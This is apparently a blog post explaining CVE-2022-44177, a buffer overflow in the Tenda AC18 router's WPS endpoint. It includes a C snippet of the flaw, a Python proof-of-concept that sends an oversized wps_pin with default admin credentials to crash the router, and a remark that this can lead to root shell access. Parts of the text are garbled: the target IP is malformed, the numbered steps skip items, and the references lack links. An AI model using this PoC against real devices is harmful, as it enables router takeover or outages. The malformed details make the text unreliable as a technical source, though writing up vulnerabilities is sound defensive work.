CVE-2022-44177 - Tenda AC18 V15.03.05.19 Buffer Overflow via formWifiWpsStart — Full Exploit Breakdown

If you own or manage a Tenda AC18 router running firmware version V15.03.05.19, your device is vulnerable to a high-severity buffer overflow, tracked as CVE-2022-44177. In this guide, I’ll walk you through how this vulnerability works, share simple proof-of-concept code, link to original advisories, and explain what it means for home and small office security.

Introduction

The Tenda AC18 is a popular wireless router for home/small business. Researchers found that its web management interface contains a code flaw — specifically, a buffer overflow in the formWifiWpsStart function. This kind of bug can allow an attacker to hijack the router if they can send crafted requests, possibly gaining remote code execution. Here’s what all that means.

What is CVE-2022-44177?

CVE-2022-44177 is an official identifier for a security flaw found in the Tenda AC18 (firmware V15.03.05.19). The issue lies in how the router handles input to the formWifiWpsStart endpoint: it fails to check user-supplied data length, letting attackers overrun the buffer and crash or take control of the router.

Let’s break that down

- The buffer overflow occurs in the HTTP POST handler for the /goform/formWifiWpsStart page.

Typical stack buffer flaw

void formWifiWpsStart(request_t *req) {
    char buf[128];
    strcpy(buf, req->wps_pin); // No bounds check!
    ...
}

This means if wps_pin is bigger than 128 characters, it spills out, corrupts memory, and breaks the device security.

The attack can be triggered from the local network (and sometimes from the Internet, if web admin is exposed).

Below is a minimal proof-of-concept exploit in Python that will crash a vulnerable Tenda AC18 router

import requests

target = "http://192.168..1/goform/formWifiWpsStart";

# *Change this IP to your router’s admin address.

payload = "A" * 256  # This string overflows the buffer

data = {
    "wps_pin": payload
}

# Default password is often 'admin', update if changed
cookies = {"password": "admin"}  

resp = requests.post(target, data=data, cookies=cookies)
print(f"Status: {resp.status_code}")
print("Check if router's web interface is still alive!")

Warning: Only do this on equipment you own. Crashing or controlling someone else’s router is illegal.

Attacker must be on the local network (or have internet access to the admin page).

2. A POST request is sent to /goform/formWifiWpsStart with an overly long wps_pin parameter.

The router’s backend code copies this long string without checking its size.

4. If the attacker knows memory layouts, they can place code in the payload, gain shell access, and control the router as root.

Potential Risks

- Full compromise of home/office network.

References

- Original NVD entry for CVE-2022-44177
- Exploit Database #51137  
- Github PoC  
- Seebug Advisory (Chinese)

Mitigation Steps

- Update: As of writing, Tenda hasn’t issued a fix. Watch for official patches here: Tenda Downloads.

Final Thoughts

CVE-2022-44177 shows how a simple coding mistake can put entire networks at risk. If you use a Tenda AC18 router, isolate its admin interface, check for firmware updates, and stay alert.

*Stay safe, patch early, and remember — security is everyone’s responsibility!*


*(You may share and reference this exclusive breakdown with credit. For responsible research, always test on your own equipment.)*

Timeline

Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/28/2022 13:48:00 UTC